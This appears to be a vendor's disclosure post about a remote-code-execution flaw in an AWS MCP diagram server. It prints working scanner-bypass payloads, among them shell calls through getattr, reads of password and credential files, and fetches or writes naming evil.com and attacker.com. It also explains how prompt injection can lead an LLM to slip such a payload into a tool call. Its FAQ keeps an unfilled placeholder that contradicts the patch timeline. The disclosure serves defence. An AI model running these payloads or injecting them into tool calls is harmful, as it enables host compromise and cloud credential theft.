Apr 21, 2026

9 min read

BlueRock Discovers Critical RCE in AWS MCP Server Ecosystem via a CLI Wrapper

BlueRock Security Team

Disclosure: Reported to AWS via HackerOne #3557138 on 2026-02-16. Acknowledged 2026-02-24. Patches applied 2026-02-16 through 2026-03-05. Publicly disclosed 2026-03-09. Server deprecated.

The Model Context Protocol (MCP) is rapidly becoming the connective tissue of AI-powered development. From code generation to infrastructure management, MCP servers let AI agents call tools, execute queries, and interact with cloud services on behalf of developers. AWS alone maintains dozens of open-source MCP servers under the awslabs project — and adoption is accelerating across the industry.

But this convenience comes with a fundamental tension: When MCP servers wrap code-execution primitives like exec(), they inherit the risk of processing untrusted inputs. When an LLM interprets a user request and calls an MCP tool, the code that reaches the server may have been shaped by prompt injection, poisoned context, or a malicious document the user never even read. Every MCP server that accepts and executes code is one bypass away from arbitrary code execution on the host.

We found exactly that. Using the MCP Trust Registry, we were able to identify key implementation patterns in the AWS Diagram MCP Server. After reporting this vulnerability to AWS through HackerOne, we are publicly disclosing the details. This vulnerability affects any deployment of AWS's open-source aws-diagram-mcp-server, an MCP server that generates architecture diagrams from Python code. The server's security scanner can be bypassed in seconds, granting full arbitrary code execution on the host. Patching the scanner is necessary, but what happens in the gap between disclosure and fix? How do you protect MCP servers that execute code by design? Let's break this one down.

Key Takeaways:

AWS’s aws-diagram-mcp-server wraps Python’s exec() behind a pattern-matching scanner — a common “CLI wrapper” pattern across MCP servers and agent skills that creates a systemic class of attack surface
The scanner’s eight-pattern denylist is trivially bypassed using Python reflection (getattr, __dict__, vars) — the attacker needs just one line of code
Exploitation can be fully automated via prompt injection — the developer never sees the malicious payload
BlueRock’s runtime protection blocks the exploit at the execution level, regardless of how the scanner is bypassed
AWS has since patched the server and deprecated it, but the underlying pattern persists across the MCP ecosystem
BlueRock’s MCP Trust Registry can identify MCP server security gaps with code level evidence to help builders protect against malicious exploits

The MCP Diagram Server `exec()` RCE

AWS maintains a large collection of open-source MCP servers under the awslabs/mcp repository on GitHub. One of these is aws-diagram-mcp-server (package: awslabs.aws-diagram-mcp-server, version 1.0.18 at the time of discovery). Its job is straightforward: accept Python code that uses the diagrams package DSL, execute it, and return a PNG architecture diagram.

The server exposes a tool called generate_diagram. An MCP client — such as Cursor, Windsurf, Cline, Claude Desktop, or any agent framework — sends a code parameter containing Python source. The server scans the code for dangerous patterns, then runs it.

The execution flow looks like this:

The vulnerability (CWE-94: Improper Neutralization of Directives in Dynamically Evaluated Code) lies in that last call. The scanner is supposed to reject dangerous code before it reaches exec(). It does not.

Root Cause: Pattern-Matching Denylist on a Privileged Namespace

The vulnerability stems from a mismatch between what the scanner checks and what the runtime provides. The scanner uses string matching to block a short list of dangerous function names. The runtime hands the user code a namespace loaded with the os module, Python's full __builtins__, and urllib's urlretrieve. The scanner never stood a chance.

The Vulnerable Code Path

The server runs three security checks before executing user code.

First, validate_syntax() in scanner.py parses the code into an AST and rejects any import or from...import statements. This check is well-implemented — it uses ast.walk() to find Import and ImportFrom nodes, a semantic check that cannot be fooled by obfuscation.

Second, check_security() runs Bandit, a static analysis tool, against the code. Bandit is designed as an advisory linter. It flags some patterns but was never built to serve as a security boundary.

Third — and this is the primary defense — check_dangerous_functions() scans every line of code for eight literal substrings:

dangerous_patterns = [
    'exec(',
    'eval(',
    'subprocess.',
    'os.system',
    'os.popen',
    '__import__',
    'pickle.loads',
    'spawn(',
]

dangerous_patterns = [
    'exec(',
    'eval(',
    'subprocess.',
    'os.system',
    'os.popen',
    '__import__',
    'pickle.loads',
    'spawn(',
]

dangerous_patterns = [
    'exec(',
    'eval(',
    'subprocess.',
    'os.system',
    'os.popen',
    '__import__',
    'pickle.loads',
    'spawn(',
]

The matching logic is a plain substring check:

for pattern in dangerous_patterns: if pattern in line:

If none of these strings appear anywhere in the user's code, the scanner gives the green light. The code then reaches diagrams_tools.py:

exec(code, namespace) # [!] VULNERABILITY

The namespace dictionary passed to exec() is constructed between lines 110 and 253 of diagrams_tools.py. Here is what the server loads into it:

namespace = {}
exec('import os', namespace)               # Full os module
exec('import diagrams', namespace)         # Diagrams package
exec('from diagrams import Diagram, Cluster, Edge', namespace)
exec('from diagrams.aws.compute import *', namespace)     # ...and ~100 more wildcard imports
exec('from urllib.request import urlretrieve', namespace)  # Network download capability

namespace = {}
exec('import os', namespace)               # Full os module
exec('import diagrams', namespace)         # Diagrams package
exec('from diagrams import Diagram, Cluster, Edge', namespace)
exec('from diagrams.aws.compute import *', namespace)     # ...and ~100 more wildcard imports
exec('from urllib.request import urlretrieve', namespace)  # Network download capability

namespace = {}
exec('import os', namespace)               # Full os module
exec('import diagrams', namespace)         # Diagrams package
exec('from diagrams import Diagram, Cluster, Edge', namespace)
exec('from diagrams.aws.compute import *', namespace)     # ...and ~100 more wildcard imports
exec('from urllib.request import urlretrieve', namespace)  # Network download capability

Python also automatically injects __builtins__ into any exec() namespace dictionary. That means the user code has access to getattr, open, eval, exec, compile, type, vars, dir, and __import__ — all of the reflection and execution primitives that Python provides.

The import blocker in validate_syntax() is irrelevant here. The attacker does not need to import anything. The server has already loaded everything dangerous into the namespace.

The "getattr Bomb"

Python's getattr() function retrieves an attribute from an object by name at runtime. It is the reflection equivalent of dot-notation access: getattr(os, 'system') returns the exact same function object as os.system. But the scanner only blocks the literal string "os.system". It has no concept of getattr.

Here is a minimal exploit payload:

getattr(os, 'system')('echo PWNED > /tmp/proof.txt')
with Diagram("PoC", show=False):
    pass

getattr(os, 'system')('echo PWNED > /tmp/proof.txt')
with Diagram("PoC", show=False):
    pass

getattr(os, 'system')('echo PWNED > /tmp/proof.txt')
with Diagram("PoC", show=False):
    pass

This code passes all three scanner checks. validate_syntax() sees no import statements. Bandit flags are nothing actionable. check_dangerous_functions() scans for "os.system" and finds only "getattr(os, 'system')" — no match. The code reaches exec(), which resolves getattr(os, 'system') to the real os.system function, and the shell command runs.

The with Diagram(...) block at the end is necessary only because the server checks whether a PNG file was created. Without it, the server returns an error message — but the shell command still executes. The attacker gets RCE regardless of the server's response.

This is not the only bypass. Here are several more, all of which pass the scanner:

getattr(os, 'popen')('whoami').read()                        # No literal "os.popen"
os.__dict__['system']('id')                                  # Dict access, no dot notation
vars(os)['popen']('cat /etc/passwd').read()                  # vars() returns __dict__
open('/etc/passwd').read()                                   # "open" is not in the denylist
open('/tmp/backdoor.sh', 'w').write('curl attacker.com')     # File write, not blocked
urlretrieve('https://evil.com/payload', '/tmp/payload')      # In namespace, not in denylist
fn = 'sys' + 'tem'; getattr(os, fn)('id')                    # Runtime string construction

getattr(os, 'popen')('whoami').read()                        # No literal "os.popen"
os.__dict__['system']('id')                                  # Dict access, no dot notation
vars(os)['popen']('cat /etc/passwd').read()                  # vars() returns __dict__
open('/etc/passwd').read()                                   # "open" is not in the denylist
open('/tmp/backdoor.sh', 'w').write('curl attacker.com')     # File write, not blocked
urlretrieve('https://evil.com/payload', '/tmp/payload')      # In namespace, not in denylist
fn = 'sys' + 'tem'; getattr(os, fn)('id')                    # Runtime string construction

getattr(os, 'popen')('whoami').read()                        # No literal "os.popen"
os.__dict__['system']('id')                                  # Dict access, no dot notation
vars(os)['popen']('cat /etc/passwd').read()                  # vars() returns __dict__
open('/etc/passwd').read()                                   # "open" is not in the denylist
open('/tmp/backdoor.sh', 'w').write('curl attacker.com')     # File write, not blocked
urlretrieve('https://evil.com/payload', '/tmp/payload')      # In namespace, not in denylist
fn = 'sys' + 'tem'; getattr(os, fn)('id')                    # Runtime string construction

The denylist contains eight patterns. Python provides dozens of paths to the same dangerous functions. This is why denylists fail against a language as reflective as Python.

Dissecting the Attack Chain

Based on our analysis, here is the full attack sequence, mapped to the MITRE ATT&CK framework.

Initial Access (T1566 / Prompt Injection): The attacker influences the code parameter sent to generate_diagram. In a direct-access scenario, the attacker is a connected MCP client. In an indirect scenario — which is more realistic — the attacker uses prompt injection. A malicious document, webpage, or chat message tricks the LLM into generating obfuscated diagram code containing the payload. The LLM calls generate_diagram on the attacker's behalf, and the human operator never sees the raw code.

Develop Capabilities (T1587.001): The attacker crafts a bypass payload. This requires minimal effort: replace os.system('cmd') with getattr(os, 'system')('cmd'). No tooling, no compilation, no binary payloads. Just one line of Python.

Defense Evasion (T1027): The payload avoids all eight denylist patterns through indirection. String concatenation, getattr(), dictionary access, and vars() all resolve to the same dangerous functions at runtime but leave no static trace the scanner can match.

Execution: Command and Scripting Interpreter (T1059.006): The server's own exec() call runs the payload inside the Python process. The code executes with the full privileges of the server — file system access, network access, environment variables, and any IAM role or credentials available to the process.

Post-Exploitation (T1005, T1565.001): With arbitrary code execution achieved, the attacker can:
Read sensitive files: open('/etc/shadow').read(), open('~/.aws/credentials').read()
Exfiltrate environment variables: getattr(os, 'environ') exposes AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, session tokens
Write files: drop SSH keys, cron jobs, or reverse shell scripts
Download payloads: urlretrieve() is already in the namespace
Pivot laterally: use the server's IAM role to access other AWS services

The attack is fully automated once the payload reaches the tool call. There is no user interaction required at the execution stage. The server processes the code, runs the scanner, passes it, and calls exec(). The entire chain completes in under a second.

Business Risks of MCP Code Injection

Failing to address code injection vulnerabilities in MCP servers carries consequences that extend well beyond the compromised process:

Cloud Account Takeover: MCP servers typically run with IAM roles or service account credentials. An attacker who achieves RCE can extract AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY from environment variables, then use those credentials to access S3 buckets, RDS databases, Lambda functions, or any other service the role permits. A single compromised diagram server can become a gateway to your entire cloud environment.

Supply Chain Amplification: In agentic workflows, MCP servers often chain together. A compromised diagram server could poison outputs consumed by downstream agents — corrupting architecture decisions, injecting malicious configurations, or influencing code generation across the pipeline. The blast radius extends far beyond the initial exploit.

Invisible Exploitation via Prompt Injection: The most dangerous variant of this attack requires no direct access to the MCP server. An attacker embeds a prompt injection payload in a document, Slack message, or webpage. When a developer asks their AI assistant to "generate a diagram of this architecture," the LLM dutifully includes the attacker's payload in the tool call. The developer never sees the raw code — they see a diagram and a success message, while the exploit runs silently in the background.

Regulatory and Compliance Exposure: Unauthorized code execution on infrastructure that handles customer data triggers breach notification obligations under GDPR, HIPAA, SOC 2, and similar frameworks. The resulting fines, legal costs, and reputational damage compound quickly.

Lateral Movement: Once inside an MCP server's execution environment, adversaries can probe for network trust, discover adjacent services, and pivot deeper into the infrastructure. An AI tool server is rarely hardened like a production database — it's often the softest target on the network.

Proof of Concept

We verified this vulnerability using the MCP Inspector, a first-party debugging tool from the Model Context Protocol project. Here is the step-by-step reproduction.

Environment setup:

git clone https://github.com/awslabs/mcp.git
cd mcp/src/aws-diagram-mcp-server
git checkout a3a1dd630ce7a01cbe634ebb645774a48ef3d926  # vulnerable commit
uv venv && uv sync --all-groups
Launch the MCP Inspector connected to the server:
npx @modelcontextprotocol/inspector \
  uv --directory $(pwd) run awslabs.aws-diagram-mcp-server
Open http://localhost:6274 in a browser. Click Connect. Navigate to the Tools tab. Click List Tools. Select generate_diagram.
In the code input field, paste the following payload:
getattr(os, 'system')('echo PWNED > /tmp/proof.txt')
with Diagram("PoC", show=False):
    pass

git clone https://github.com/awslabs/mcp.git
cd mcp/src/aws-diagram-mcp-server
git checkout a3a1dd630ce7a01cbe634ebb645774a48ef3d926  # vulnerable commit
uv venv && uv sync --all-groups
Launch the MCP Inspector connected to the server:
npx @modelcontextprotocol/inspector \
  uv --directory $(pwd) run awslabs.aws-diagram-mcp-server
Open http://localhost:6274 in a browser. Click Connect. Navigate to the Tools tab. Click List Tools. Select generate_diagram.
In the code input field, paste the following payload:
getattr(os, 'system')('echo PWNED > /tmp/proof.txt')
with Diagram("PoC", show=False):
    pass

git clone https://github.com/awslabs/mcp.git
cd mcp/src/aws-diagram-mcp-server
git checkout a3a1dd630ce7a01cbe634ebb645774a48ef3d926  # vulnerable commit
uv venv && uv sync --all-groups
Launch the MCP Inspector connected to the server:
npx @modelcontextprotocol/inspector \
  uv --directory $(pwd) run awslabs.aws-diagram-mcp-server
Open http://localhost:6274 in a browser. Click Connect. Navigate to the Tools tab. Click List Tools. Select generate_diagram.
In the code input field, paste the following payload:
getattr(os, 'system')('echo PWNED > /tmp/proof.txt')
with Diagram("PoC", show=False):
    pass

Click Run Tool.

The server returns a success response. The diagram was generated. The shell command was also executed.

Verify in a terminal:

The scanner did not flag the payload. The exec() call ran it without restriction. The file was written to disk by a shell command that the server was never supposed to allow.

BlueRock's Runtime Protection: Neutralizing MCP Code Injection

BlueRock's runtime protection mechanisms are designed to stop the behaviors this exploit relies on. The scanner bypass is irrelevant to BlueRock because we do not rely on static pattern matching. We monitor what the process actually does at runtime.

MCP Protection (BR-102)

The MCP ecosystem introduces a new class of attack surface: AI agents calling tools that execute code on the host. Traditional security tools were not designed for this interaction pattern — they don't understand MCP protocol semantics, can't distinguish legitimate tool calls from injected ones, and have no visibility into the intent behind a code parameter.

BlueRock's MCP Protection addresses this gap by operating as an inline security layer alongside MCP deployments. Rather than trusting the application-level scanner (which, as we've demonstrated, can be trivially bypassed), BlueRock monitors the runtime behavior of MCP tool executions. When generate_diagram passes attacker-controlled code to exec(), BlueRock observes the resulting system calls — not the source code patterns. It doesn't matter whether the attacker used getattr, __dict__, vars, or string concatenation to reach os.system. The moment the Python process attempts to fork a shell, BlueRock intercepts and blocks it.

This is particularly critical for MCP servers because they are designed to execute code. You cannot simply block exec() — the server needs it to function. BlueRock draws the line at what the executed code is allowed to do, enforcing behavioral boundaries that distinguish legitimate diagram generation from malicious exploitation.

Python OS Command Injection Prevention (BR-77)

BlueRock's behavioral analysis monitors Python processes for execution patterns indicative of OS command injection. When exec() resolves getattr(os, 'system') and attempts to spawn a shell process, BlueRock intercepts the call at the system boundary. It does not matter how the attacker obtained the function reference — through getattr, __dict__, vars, or any other indirection. The observable behavior is the same: a Python process attempting to fork a shell. BlueRock blocks it before the command executes.

System & Data Integrity Protection (BR-75, BR-91, BR-54)

Even if an attacker finds a way past the initial command injection defense, BlueRock provides additional layers:

Critical Directory Write Protection (BR-75) prevents any unauthorized process from writing to sensitive locations like /home/*/.ssh/, /etc/cron.d/, or application configuration directories. An exploit that attempts to drop an SSH key or a cron job for persistence is stopped at the write call.

Sensitive File Access (BR-91) blocks the RCE from reading files like /etc/shadow, private keys, or cloud credential files. The attacker's attempt to exfiltrate secrets from the filesystem is denied.

Container Drift Protection (BR-54) detects and blocks new binaries or scripts that were not part of the original container image. If the attacker downloads a payload via urlretrieve and attempts to execute it, BR-54 prevents the execution. The container's integrity is preserved.

These protections operate independently of the vulnerability's specifics. BlueRock does not need a signature for this particular exploit. It enforces behavioral boundaries that no code injection — regardless of how it evades the application-level scanner — can cross.

Disclosure Timeline and AWS Response

BlueRock discovered and reported this vulnerability to AWS through HackerOne. Following our report, AWS addressed the issue across multiple commits:

1. Feb 16, 2026 — AST-based scanner rewrite. The string-matching denylist was replaced with proper AST analysis that detects getattr(), vars(), globals(), compile(), dunder access, and other bypass techniques we reported.

2. Feb 26, 2026 — Namespace hardening. The os module and bare __builtins__ were removed from the exec() namespace. The raw urlretrieve was replaced with a safe wrapper that validates URL schemes, file extensions, and prevents path traversal.

3. Mar 5, 2026 — Subprocess isolation. User code execution was moved from in-process exec() to a sandboxed subprocess via _sandbox_runner.py, adding defense-in-depth process isolation. The AST scanner was further expanded to detect frame traversal and code object attributes.

The server has since been deprecated by AWS, with users directed to the diagram agent skill in the deploy-on-aws plugin instead. Notably, none of these security fixes were documented in the project's CHANGELOG.md — organizations running pinned versions of the server may not be aware that security patches exist.

The vulnerable version (commit a3a1dd63, package version 1.0.18) remains exploitable. Any deployment that has not updated to the latest main branch — or that uses the server at all, given its deprecated status — should migrate immediately.

Beyond the Patch: Securing the Behavior, Not Just the Bug

This vulnerability is a textbook case of CWE-94: Code Injection. AWS's response was thorough: they rewrote the scanner to use AST analysis, stripped dangerous modules from the namespace, and moved execution into a sandboxed subprocess. But this addresses one server in one repository.

The deeper problem is architectural. The aws-diagram-mcp-server is a textbook example of a CLI wrapper — an MCP tool that accepts user input and passes it to a code execution primitive. This pattern is everywhere: diagram generators, query runners, data processors, and agent skills all follow the same shape. Each one is a potential exec() away from RCE, and the MCP and agent skill ecosystem will only produce more of them.

Instead of chasing individual vulnerabilities, we secure against the behavior of the exploit itself. BlueRock's runtime protection does not need to know about this specific bug to stop it. It understands that a Python process spawned by an MCP server should not be allowed to fork shells, write to SSH directories, or read credential files. These are fundamental, unauthorized behaviors — and they are the same regardless of whether the attacker used getattr, __dict__, vars, or some technique that has not been invented yet.

By focusing on execution boundaries rather than code patterns, BlueRock provides a durable defense that does not expire with the next bypass technique. It gives your team the space to patch on your schedule, not the attacker's.

Secure Your MCP Infrastructure

Know what's safe before you connect. The MCP Trust Registry scans and evaluates MCP servers across 22+ security rules — covering exposure, authentication, tool risk, data egress, and runtime dependencies — so you can assess risk before integration. Explore the registry or scan your own MCP server.

Enforce runtime guardrails on every agent action. BlueRock Guardrails applies real-time policy enforcement at the point where agents invoke tools and trigger downstream actions — blocking unauthorized behaviors like the exploit demonstrated in this post, with less than 5ms latency overhead. Schedule a demo to see it in action.

FAQ

Is aws-diagram-mcp-server still vulnerable?

The vulnerability (CWE-94) was disclosed by BlueRock to AWS Security via HackerOne (Report #3557138). [Team: update with patch status and fixed version once AWS confirms.] Until a patched version is deployed, any MCP client connected to aws-diagram-mcp-server v1.0.18 can achieve full remote code execution on the host by bypassing the denylist scanner with Python reflection primitives like getattr().

How does the aws-diagram-mcp-server RCE work?

The server accepts Python code, scans it for 8 dangerous string patterns, then executes it via exec(). The scanner fails because the exec() namespace is pre-loaded with the full os module, Python's __builtins__, and urllib's urlretrieve — all before user code runs. Bypassing the scanner requires only one line: getattr(os, 'system')('cmd'), which the scanner doesn't recognize as dangerous but Python's runtime resolves to the real os.system function.

Why do denylist scanners fail against Python's exec()?

Python provides dozens of paths to the same dangerous functions: getattr(), __dict__ access, vars(), and runtime string construction all resolve to identical function objects but produce no string the scanner can match. The denylist contains 8 patterns; Python offers dozens of bypasses. This is a fundamental category error — static string matching cannot cover a language as reflective as Python.

How does BlueRock's runtime protection stop this exploit?

BlueRock does not rely on string pattern matching. BR-102 (MCP Protection) inspects protocol traffic between clients and MCP servers for behavioral anomalies. BR-77 (Python OS Command Injection Prevention) intercepts exec() at the system boundary when it attempts to spawn a shell process — regardless of whether the attacker used getattr, __dict__, vars, or any other indirection. Additional layers BR-75, BR-91, and BR-54 block file writes, credential reads, and container drift even if initial protection is bypassed.

What is the post-exploitation impact of this vulnerability?

With arbitrary code execution achieved, an attacker can read sensitive files (including /etc/shadow and ~/.aws/credentials), exfiltrate AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY from environment variables, write SSH keys or cron jobs for persistence, download payloads via urlretrieve (which is pre-loaded in the exec namespace), and pivot laterally using the server's IAM role.

Latest articles

Browse all

Claude Changed Who Builds Software. Now Enterprises Must Learn to Operate What Gets Built.

Jul 1, 2026

10 minutes

Claude Changed Who Builds Software. Now Enterprises Must Learn to Operate What Gets Built.

Jul 1, 2026

10 minutes

Claude Changed Who Builds Software. Now Enterprises Must Learn to Operate What Gets Built.

Jul 1, 2026

10 minutes

How to detect shadow MCP servers

Jun 29, 2026

4 minutes

How to detect shadow MCP servers

Jun 29, 2026

4 minutes

How to detect shadow MCP servers

Jun 29, 2026

4 minutes

BlueRock Discovers Critical RCE in AWS MCP Server Ecosystem via a CLI Wrapper

BlueRock Security Team

The MCP Diagram Server exec() RCE

Root Cause: Pattern-Matching Denylist on a Privileged Namespace

The Vulnerable Code Path

The "getattr Bomb"

Dissecting the Attack Chain

Business Risks of MCP Code Injection

Proof of Concept

BlueRock's Runtime Protection: Neutralizing MCP Code Injection

MCP Protection (BR-102)

Python OS Command Injection Prevention (BR-77)

System & Data Integrity Protection (BR-75, BR-91, BR-54)

Disclosure Timeline and AWS Response

Beyond the Patch: Securing the Behavior, Not Just the Bug

Secure Your MCP Infrastructure

FAQ

Latest articles

Claude Changed Who Builds Software. Now Enterprises Must Learn to Operate What Gets Built.

Claude Changed Who Builds Software. Now Enterprises Must Learn to Operate What Gets Built.

Claude Changed Who Builds Software. Now Enterprises Must Learn to Operate What Gets Built.

How to detect shadow MCP servers

How to detect shadow MCP servers

How to detect shadow MCP servers

The MCP Diagram Server `exec()` RCE